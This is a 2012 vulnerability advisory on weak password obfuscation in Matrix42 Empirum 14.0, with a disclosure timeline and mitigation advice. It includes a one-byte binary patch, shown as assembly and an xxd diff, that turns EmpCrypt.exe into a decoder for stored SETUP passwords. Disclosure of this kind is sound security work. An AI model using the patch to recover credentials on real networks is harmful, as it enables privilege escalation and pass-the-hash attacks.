Vulnerability: Empirum Password Obfuscation Design Flaw

# Vuln Title: Empirum Password Obfuscation Design Flaw
# Date: 20.12.2012
# Author: otr
# Software Link:
# Version: 14.0
# Tested on: Windows
# CVE : To be assigned

# Risk: medium
# Type: Privilege Escalation
# Vendor: Matrix42

# STATUS: final


2012-12-20 Flaw Discovered
2013-01-08 Vendor contacted
2013-01-14 Vendor contacted (again)
2013-02-08 Vendor contacted (again)
2013-02-13 No response from vendor
2013-02-13 Public disclosure


The Empirum software from Matrix42 is prone to a trivial password recovery
attack that allows users to obtain passwords encrypted with the EmpCrypt.exe.


Empirum is a product that featues software management and OS installation over
the network. For the network installation feature Empirum uses a combination of
bootp/tftp (PXE) and smb (or http/https). The Empirum server serves two hidden
shares via SMB. These are EMPINST$ and CONFIGURATOR$. The two shares contain OS
images, software management files and configuration files. The  Empirum agent
which is installed on the client workstations uses these configuration files in
order to install the operating system, configure it and manage the workstation
(e.g. install patches).

Design Flaw:

The Empirum ini configuration files on the CONFIGURATOR$ share which define
several settings used by the Empirum Agent also define passwords for use in
Empirum. These are the following SETUP, MD5, EIS and SYNC. The MD5 password is
an unsalted raw MD5 hash of the password. The SETUP, EIS, and SYNC passwords use
other obfuscation methods. The SETUP, EIS, and SYNC Passwords can be prepared by
the Empirum Administator using the EmpCrypt.exe tool which is part of Empirum.
It was found that sometimes all of the four password values in the configuration
file are an obfuscation of the same password (it was not verified if this is
always the case).

The SETUP password uses a kind of obfuscation that can easily be deobfuscated
using a modified EmpCrypt.exe tool. The hashing algorithms of the SETUP/EIS and
SYNC passwords were not analyzed in detail, but apparently SETUP and EIS
passwords are hashed passwords. For different input values they have a constant
length output value. It was not verified if cryptographically secure hashing
algorithms are used. SETUP passwords are not hashes (the length of the SETUP
values is variable) but some form of encoding. The EmpCrypt.exe tool already
contains functionality to decrypt SETUP passwords which is not exposed via the
command line interface. Using a reverse engineering and binary patching it is
possible to create a version of EmpCrypt.exe that decodes SETUP passwords. There
may be simpler ways to archeive this e.g. an undocumented command line parameter.

The decoded password can be used by an attacker to perform various attacks
inside of a windows domain, as pass the hash to other systems or privilege
escalations. It may also disclose internal password policies or password
creation patterns. That allow the attacker to perform further password cracking.


Empcrypt.exe   /SETUP "ABC       -> copies password "*YZXZ" into clipboard
EmpDecrypt.exe /SETUP "*YZXZ"    -> copies "ABC" into clipboard

Empcrypt to EmpDecrypt binary patch:

   EmpDecrypt.exe is a patched EmpCrypt.exe at the following code:

        mov esi, 0Fh
        mov [ebp+var_1C], esi
        mov [ebp+var_20], ebx
        cmp [ebp+var_4F], bl
        jnz loc_402284  <- in the original code this was jz

   Or in hex encoding:

    # diff <(xxd -c 16 EmpCrypt.exe) <(xxd -c 16 EmpDecrypt.exe)
    < 0001510: 45fc 01e8 5815 0000 385d b10f 8463 0100  E...X...8]...c..
    > 0001510: 45fc 01e8 5815 0000 385d b10f 8563 0100  E...X...8]...c..


In Windows environment the active directory and domain structure may be used in
order to handle authentication and avoid storing weakly obfuscated passwords
accessible to workstations.